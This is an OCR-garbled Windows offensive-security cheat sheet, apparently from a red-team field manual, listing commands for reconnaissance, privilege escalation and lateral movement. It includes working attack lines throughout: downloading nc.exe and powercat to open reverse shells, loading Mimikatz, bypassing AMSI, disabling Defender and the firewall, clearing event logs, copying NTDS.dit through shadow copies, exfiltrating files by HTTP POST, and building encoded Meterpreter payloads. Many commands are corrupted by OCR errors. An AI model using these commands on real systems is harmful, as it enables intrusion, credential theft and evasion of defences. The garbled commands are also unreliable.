Comment on page
Windows
Number or ID | Versions |
---|---|
NT 3.1 | Windows NT 3.1 (All) |
NT 3.5 | Windows NT 3.5 (All) |
NT 3.51 | Windows NT 3.51 (All) |
NT 4.0 | Windows NT 4.0 (All) |
NT 5.0 | Windows 2000 (All) |
NT 5.1 | Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded) |
NT 5.2 | Windows XP (64-bit, Pro 64-bit) Windows Server 2003 & R2 (Standard, Enterprise) Windows Home Server |
NT 6.0 | Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate) |
NT 6.1 | Windows 7 (Starter, Home, Pro, Enterprise, Ultimate) Windows Server 2008 R2 (Foundation, Standard, Enterprise) |
NT 6.2 | Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) Windows Phone 8 Windows Server 2012 (Foundation, Essentials, Standard) |
Command | Explanation |
%SYSTEMROOT% | Usually C:\Windows |
%SYSTEMROOT%\System32\drivers\etc\hosts | DNS Entities |
%SYSTEMROOT%\System32\drivers\etc\networks | Network settings |
%SYSTEMROOT% system32 config\SAM | Username and password hash |
%SYSTEMROOT%\repair\SAM | Copy of SAM |
%SYSTEMROOT%\System32\config\RegBack\SAM | Backup copy of SAM |
%WINDIR%\system32\config\AppEvent.Evt | Program reports |
%WINDIR%\system32\config\SecEvent.Evt | Security reports |
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\ | Startup path |
%USERPROFILE%\Start Menu\Programs\Startup\ | Startup path |
%SYSTEMROOT%\Prefetch | Path Prefetch (EXE reports) |
# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
%SystemDrive%\wmiOWS\Start Menu\Programs\Startup
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
Command | Explanation |
version | Operating system version |
sc query state=all | Show services |
tasklist /svc | Show process and services |
tasklist /m | Show all processes and dlls |
tasklist /S ip /v | Remotely running processes |
taskkill /PID pid /F | Forced removal of the process |
systeminfo /S ip /U domain\user /P Pwd | Receive system information remotely |
reg query \ ip \ RegDomain \ Key /v VALUE | Send a query to the registry, /s=all values |
reg query HKLM /f password /t REG_SZ /s | Registry search for passwords |
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate | WSUS address |
fsutil fsinfo drives | List of drivers • need admin access |
dir /a /s /b c:'.pdf’ | Search for all pdf files |
dir /a /b c:\windows\kb’ | Search for patches |
findstr /si password’ .txt I •.xmll •.xls | Search files for passwords |
tree /F /A c: tree.txt | List of folders on drive C: |
reg save HKLM\Security security.hive | Save security hives inside the file |
echo %USERNAME% | Current user |
whoami /priv | Current user permissions |
Command | Description |
---|---|
net view /domain | Current domain host |
net view /domain: [MYDOMAIN] | hosts in [MYDOMAIN] |
net user /domain | All users of the current domain |
net user user pass /add | Add user |
net localgroup "Administrators" user /add | Add user to Administrators |
net accounts /domain | Domain password policies |
net localgroup "Administrators" | List of Local Admins |
net group /domain | List of domain groups |
net group "Domain Admins" /domain | List of Admin users in the domain |
net group "Domain Controllers" /domain | List of DCs for the current domain |
net share | SMB share |
net session I find I "\" | List of active SMB sessions |
net user user /ACTIVE:yes /domain | Open domain domain |
net user user '' newpassword '' /domain | Change domain username and password |
net share share c:\share /GRANT:Everyone,FULL | Shared folder |
Command | Description |
---|---|
tasklist /S ip /v | Processes running on ip |
systeminfo /S ip /U domain\user /P Pwd | IP information |
net share \\ ip | ip environment |
net use \\ ip | ip system file |
net use z: \\ ip \share password /user: DOMAIN user | Map drive, specified credentials |
reg add \\ ip \ regkey \ value | Added registry key for ip |
sc \\ ip create service binpath=C:\Windows\System32\x.exe start=auto | Create a remote service (space after start=) |
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:/windows/temp/nc.exe | Copy file from ip to current system by cmd.exe |
cmd.exe /c c:/windows/temp/nc.exe ip port -e cmd.exe | Shell reverse |
nc.exe -lvvp port | Listening on specific port |
python3 -m http.server port | Create webserver |
xcopy /s \\ ip \dir C:\local | Copy of ip fodder |
shutdown /m \\ ip /r /t 0 /f | restart system with ip |
Command | Description |
---|---|
ipconfig I all | ip settings |
ipconfig /displaydns | DNS cache |
netstat -ana | Show connection |
netstat -anop tcp 1 | Create Netstat loop |
netstat -ani findstr LISTENING | Ports in use |
route print | Route tables |
arp -a | Get system MACs (using ARP table) |
nslookup, set type=any, ls -d domain results.txt, exit | Get DNS Zone Xfer |
nslookup -type=SRV _www._tcp.url.com | Get Domain SRV lookup (ldap, kerberos, sip) |
tftp -I ip GET remotefile | File Transfer in TFTP |
netsh wlan show profiles | Profiles stored on the wireless network |
netsh firewall set opmode disable | Firewall deactivation ('Old) |
netsh wlan export profile folder=. key=clear | wifi extraction in plaintext |
netsh interface ip show interfaces | List of IDs/MTUs related to interfaces |
netsh interface ip set address local static ip nmask gw ID | Set IP |
netsh interface ip set dns local static ip | DNS server configuration |
netsh interface ip set address local dhcp | Set interface to use DHCP |
Command | Description |
---|---|
type file | Show file contents |
del path \' .• /a /s /q /f | Delete files in current path |
find /I ''str'' filename command I find /c /v "" | List of cmd outputs |
at HH:MM file [args] (i.e. at 14:45 cmd /c) | File execution schedule |
runas /user: user " file [args]" | Execute file with specific user |
restart /r /t 0 | Restart |
sc stop UsoSvc | Stop the UsoSvc service |
sc start UsoSvc | Starting the UsoSvc service |
sc config UsoSvc binpath="c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe" | Change path of executable file by UsoSvc |
tr -d '\15\32' win.txt unix.txt | Delete CR & 'Z ('nix) |
makecab file | Compression |
Wusa.exe /uninstall /kb: ### | Delete patch |
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true" | Using the Event Viewer in the CLI |
lusrrngr.msc | Using Local user manager |
services.msc | Using Services control panel |
taskmgr.exe | Using Task manager |
secpool.rnsc | Using Security policy manager |
eventvwr.rnsc | Using Event viewer |
rundll32.dll user32.dll LockWorkstation
netsh advfirewall set currentprofile state off netsh advfirewall set allprofiles state off
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2
#Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=l.l.l.l
reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /t REG DWORD /d 0 /f
psexec /accepteula \\ targetiP -u domain\user -p password -c -f \\ smbiP \share\file.exe
psexec /accepteula \\ ip -u Domain\user -p Lt1 c:\Program-1
psexec /accepteula \\ ip -s cmd.exe
Create regfile.reg file with following line in it: HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService
"fDenyTSCo~nections"=dword: 00000000
reg import reg file. reg
net start ''terrnservice''
sc config terrnservice start= auto
net start terrnservice
--OR--
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD "HKLt1\System\CurrentControlSet\Control \Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable
schtasks.exe /create /tn t1yTask /xml "C:\MyTask.xml" /f
Command | Description |
---|---|
wmic [alias] get /? | List of all features |
wmic [alias] call /? | Callable method |
wmic process list full | process properties |
wmic startupwmic service | start wmic service |
wmic ntdomain list | Domain and DC information |
wmic qfe | List of all patches |
wrnic process call create "process_name" | Run process |
wmic process where name="process" call terminate | Delete process |
wmic logicaldisk get description,name | Display logical sharing environment |
wmic cpu get DataWidth /format:list | Show 32-bit or 64-bit version of the system |
wmic service where started = true get name, startname | Show running services |
[alias] == process, share, startup, service, nicconfig, useraccount, etc.
[where] ==where (name="cmd.exe"), where (parentprocessid!=[pid]"), etc.
[clause] ==list [fulllbrief], get [attribl, attrib2], call [method], delete
wmic /node: targetiP /user:domain\user /password:password process call create "\ \ smbiP \share\evil.exe"
wmic product get name /value # Get software names
wmic product where name="XXX" call uninstall /nointeractive
wmic /node:remotecomputer computersystern get username
wmic /node:machinename process list brief /every:l
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
AllowTSConnections=''O'' call SetAllowTSConnections ''1''
wmic netlogin where (name like "%adm%") get numberoflogons
wmic service get narne,displayname,pathnarne,startrnode
| findstr /i nauton | findstr /i /v "C:\windows\\" | findstr /i /v """
1. wmic /node: DC IP /user:"DOI1AIN\user" /password:"PASS" process
call create "cmd /c vssadmin list shadows 2 &1
c:\temp\output.txt"
# If any copies alread1 ex~st then exfil, otherwise create using
following commands. Check output.txt for anJ errors
2. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process
call create "cmd /c vssadmin create shadow /for=C: 2 &1
C:\temp\output.txt"
3. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process
call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVol~meShadowCopy1\Windows\System32\co nfig\SYSTEM
C:\temp\system.hive 2 &1
C:\temp\output.txt"
4. wmic /node: DC IP /user: "DOl'.llUN\user" /password: "PASS" process call create ''cmd /c copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyc\NTDS\NTDS.dit
C:\temp\ntds.dit 2 &1 C:\temp\output.txt"
Step by step instructions on room362.com for step below
5. From Linux, download and run ntdsxtract and libesedb to export
hashes or other domain information
a. Additional instructions found under the VSSOWN section
b. ntdsxtract - http://www.ntdsxtract.com
c. libesedb - http://code.google.com/p/libesedb/
Command | Description |
stop-transcript | Stop recording |
get-content file | Display the contents of the file |
get-help command-examples | Display sample command |
get-command ‘string’ | Search for cmd |
get-service | Show services (stopservice, start-service) |
get-wmiobject -class win32 service | Show services with the same identity information |
$PSVersionTable | Show powershell version |
powershell.exe -version 2.0 | Run powershell 2.0 from version 3.0 |
get-service measure-object | Information returned from the service |
get-psdrive | List returned from PSDrives |
get-process select -expandproperty name | show names |
get-help ‘-parameter credential | Receive identity information |
get-wmiobject -list -‘network’ | WMI available on the network |
(Net.DNS]: :GetnostEntry(” ip “I | Process DNS Lookup |
powershell.exe wget “http://10.10.10.10/nc.exe” -outfile “c:\temp\nc.exe” | Download and save the file |
poweshell.exe -c “IEX (New-Object System.Net.WebClient).DownloadString(‘http://10.10.10.10:8000/powercat.ps1’); powercat -c 10.10.10.100 -p 4444 -e cmd | reverse loose |
https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18df36d8e890fefe96a06891dd47d/SimpleHttpServer.ps1 | Web server with port 8050 |
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | Use mimikatz |
call ps1 files | Import-Module .\Invoke-Mimikatz.ps1 |
Download and save the file iwr -uri http://10.10.10.10/file -o file.exe |
Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1
Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out
Or
https://raw.githubusercontent.com/kmkz/Pentesting/master/AMSI-Bypass.ps1
. .\AMSI-Bypass.ps1
Invoke-AmsiBypass
powershell -command set-mpppreference -Disable realtimemonitoring $true
$users = New-Object DirectoryServices.DirectorySearcher
$users.Filter = "(&(objectclass=user))"
$users.SearchRoot = ''
$users.FindAll()
$computers = New-Object DirectoryServices.DirectorySearcher
$computers.Filter = "(&(objectclass=computer))"
$computers.SearchRoot = ''
$computers.FindAll()
Set-ADAccountControl -identity jorden -doesnotrequirepreauth 1
Get-EventLog -list
Clear-EventLog -logname Application, Security -computername SVR01
Get-WmiObject -class win32 operatingsystem | select -property ' |
export-csv c:\os.txt
Get-Service | where_object {$_.status -eq "Running"}
New-PSJrive -Persist -PSProvider FileSjstem -Root \\1.1.1.1\tools -Name i
Get-Childitem -Path c:\ -Force -Rec~rse -Filter '.log -ErrorAction
SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}
(new-object sjstem.net.webclient).downloadFile(''url'',''dest'')
$ports=(#,#,#) ;$ip="x.x.x.x";foreach ($port in $ports) {try
($socket=New-object Sjstem.Net.Sockets.TCPClient($ip,$port); }catch(};
if ($socket -eq $NULL) (echo $ip":"$port"- Closed";}
else(echo $ip":"$port"- Open";$socket =$NULL;}}
$ping = New-Object Sjstex.Net.Networkinformation.ping
$ping.Send(''ip'',5JO)
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential(" title "," message "," user" "," domain")
powershell. exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match
'201308 ( 0 [ 8-9] |1 [0-1])-(0[ 8-9]]|1 [ 0-7]) [ 0-5] [ 0-9]') {Start-Process -
WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400))while(1)"
$pw ~ convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp ~ new-object -typename System.Management.Automation.PSCredential -
argument list "DOMAIN\user", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command
&{Start-Process file.exe -verb runas)'
𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙 𝑖𝑤𝑟 − 𝑢𝑠𝑒𝑏𝑎𝑠𝑖𝑐𝑝𝑎𝑟𝑠𝑖𝑛𝑔 ℎ𝑡𝑡𝑝://192.168.2. 𝑥/𝑆ℎ𝑎𝑟𝑝𝐻𝑜𝑢𝑛𝑑. 𝑒𝑥𝑒 − 𝑂𝑢𝑡𝐹𝑖𝑙𝑒 − 𝑆ℎ𝑎𝑟𝑝𝐻𝑜𝑢𝑛𝑑. 𝑒𝑥e
powershell.exe Send-l-1ai1Hessage -to "email" -from "email" -subject
"Subject" -a "attachment file path" -body "Body" -SmtpServer Target
Email Server IP
net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item
wsman:\localhost\client\trustedhosts ''"
at \ \ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username
Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class
MicrosoftDNS _ ResourceRecord -Filter "domainname~' DOMAIN '" | select
textrepresentation
powershell.exe -noprofile -noninteractive -command
"[System.Net.ServicePointManager] ::ServerCertificateValidationCallback =
{$true); $source="""https:ll YOUR SPECIFIED IP I file.zip """;
$destination="C:\rnaster.zip"; $http = new-object Systern.Net.WebClient;
$response= $http.DownloadFile($source, $destination);"
Script will send a file ($filepath) via http to server ($server) via POST request.
Must have web server listening on port designated in the $server
powershell.exe -noprofile -noninteractive -command
"[S;stem.Net.ServicePointManager] ::ServerCertificateValidationCallback =
{$true); $server="""http:// YOUR_SPECIFIED IP / folder """;
$filepath="C:\master.zip" $http= new=object System.Net.WebClient;
$response= $http.UploadFile($server,$filepath);"
Need Metasploit v4.5+ (msfvenom supports Powershell)
Use Powershell (x86) with 32 bit Meterpreter payloads
encodeMeterpreter.psl script can be found on next page
1. ./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86 LHOST=1.1.1.1 LPORT=443 audit.psl
2. Move audit.psl into same folder as encodeMeterpreter.psl
3. Launch Powershell (x86)
4. powershell.exe -executionpolicy bypass encodeMeterpreter.psl
5. Copy the encoded Meterpreter string
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse https
4. set LHOST 1. 1. 1. 1
5. set LPORT 443
6. exploit -j
1. powershell. exe -noexi t -encodedCommand paste encoded Meterpreter
string here
PROFIT
# Get Contents of Script
$contents = Get-Content audit.psl
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]: :Compress
$cs =New-Object IO.Compression.DeflateStream ($ms,$action)
$sw =New-Object IO.StreamWriter ($cs, [Text.Encoding] ::ASCII)
$contents I ForEach-Object {$sw.WriteLine($ I)
$sw.Close()
# Base64 Encode Stream
$code= [Convert]: :ToBase64String($ms.ToArray())
$command= "Invoke-Expression '$(New-Object IO.StreamReader('$(New-Object
IO. Compression. DeflateStream ('$(New-Object IO. t4emoryStream
(, '$ ( [Convert] : : FromBase64String ('"$code'") ) I I ,
[IO.Compression.Compressiont~ode]: :Decompress) I,
[Text.Encoding]: :ASCII)) .ReadToEnd() ;"
# Invoke-Expression $command
$bytes= [System.Text.Encoding] ::Unicode.GetBytes($command)
$encodedCommand = [Convert]: :ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved.
Please see reference [7] for disclaimer
1. msfpayload windows/rneterpreter/reverse tcp LHOST=10.1.1.1
LPORT~8080 R I msfencode -t psh -a x86
1. c:\powershell
2. PS c:\ $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
3. PS c:\ $u = [System.Text.Encoding]: :Unicode.GetBytes($crnd)
4. PS c: \ $e = [Convert] ::ToBase64String($u)
5. PS c:\ $e
6. Copy contents of $e
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j
1. c: \ powershell -noprofile -noninteracti ve -command " &
{$client=new-object
System.Net.WebClient; $client.DownloadFile('http://1.1.1.1/shell.txt
', 'c:\windows\temp\shell.txt') )"
2. c: \ powershell -noprofile -noninteracti ve -noexi t -command " &
{$crnd~tjpe 'c:\windows\temp\shell.txt';powershell -noprofilenoninteractive
-noexit -encodedCornmand $cmd} "
PROFIT
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
. .\PowerUp.ps1
HKLM\Software\Microsoft\Windows NT\CurrentVersion
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v
ProductNarne
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner
HKLM\Software\~icrosoft\Windows NT\CurrentVersion /v SystemRoot
HKLM\System\CurrentControlSet\Control\TimeZoneinformation /v ActiveTirneBias
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive
MRU
HKLM\System\MountedDevices
HKLM\System\CurrentControlSet\Enurn\USBStor
HKEY_LOCAL_~ACHI~E\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters -
IPEnableRouter = 1
HKEY LOCAL MACHINE\Security\Policy\Secrets
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon
HKLM\Security\Policy\PolAdTev
HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services
HKLM\Software
HKCU\Software
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisite
dtmu & \Opensavetmu
HKCU\Software\Microsoft\Internet Explorer\TypedURLs
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU